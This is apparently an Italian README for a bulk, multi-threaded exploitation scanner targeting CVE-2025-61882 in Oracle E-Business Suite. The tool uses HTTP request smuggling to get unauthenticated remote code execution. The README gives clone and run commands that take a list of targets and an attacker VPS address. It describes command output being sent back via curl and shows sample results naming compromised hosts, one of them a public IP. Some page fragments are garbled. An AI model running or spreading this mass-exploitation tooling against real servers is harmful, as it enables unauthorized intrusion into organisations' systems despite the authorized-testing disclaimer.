
Scanner multi-thread per CVE-2025-61882 in Oracle E-Business Suite, che sfrutta lo smuggling di richieste HTTP per ottenere esecuzione remota di codice non autenticata e validarla tramite l'output dei comandi.
Uno scanner bulk veloce e multi-thread per rilevare CVE-2025-61882 nelle installazioni di Oracle E-Business Suite. Questa vulnerabilità critica consente l'esecuzione remota di codice non autenticata.
id e analizzando l'outputvuln-output.txtpip install requests
Tutto qui. Basta Python 3.7+ e la libreria requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS --threads 10
Crea un file targets.txt con un URL per riga:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Caricati 1235 target dal file
[*] Esecuzione con 20 thread concorrenti
[*] Gli host vulnerabili verranno salvati in vuln-output.txt
[*] [1/1235] Verifica di https://target1.com:443 sulla porta 7893
[*] [2/1235] Verifica di https://target2.com:443 sulla porta 5882
[+] Trovato! 129.146.56.43 è vulnerabile
[+] Output del comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scansione completata in 245.67 secondi
[*] Trovati 3 target vulnerabili
[*] Controlla vuln-output.txt per i risultati completi
=================================================================
[+] Target vulnerabili trovati:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
I risultati vengono salvati in vuln-output.txt:
# Oracle EBS CVE-2025-61882 - Risultati della Scansione
# Iniziata: Tue Oct 07 15:30:45 2025
# Totale target: 1235
# Scanner di: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id e invia l'output tramite curluid=...gid=...Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. Ricorda sempre:
L'accesso non autorizzato a sistemi informatici è illegale.
Hai trovato un bug? Hai una richiesta di funzionalità?
git checkout -b feature/funzionalita-straordinaria)git commit -m 'Aggiungi una funzionalità')git push origin feature/funzionalita-straordinaria)Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.
Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo a tuo rischio.
Realizzato con ❤️ per la community infosec
| Argomento | Obbligatorio | Predefinito | Descrizione |
|---|
--targets | Sì | - | Percorso del file contenente gli URL dei target |
--lhost | Sì | - | Indirizzo IP del tuo VPS/attaccante |
--threads | No | 20 | Numero di thread concorrenti |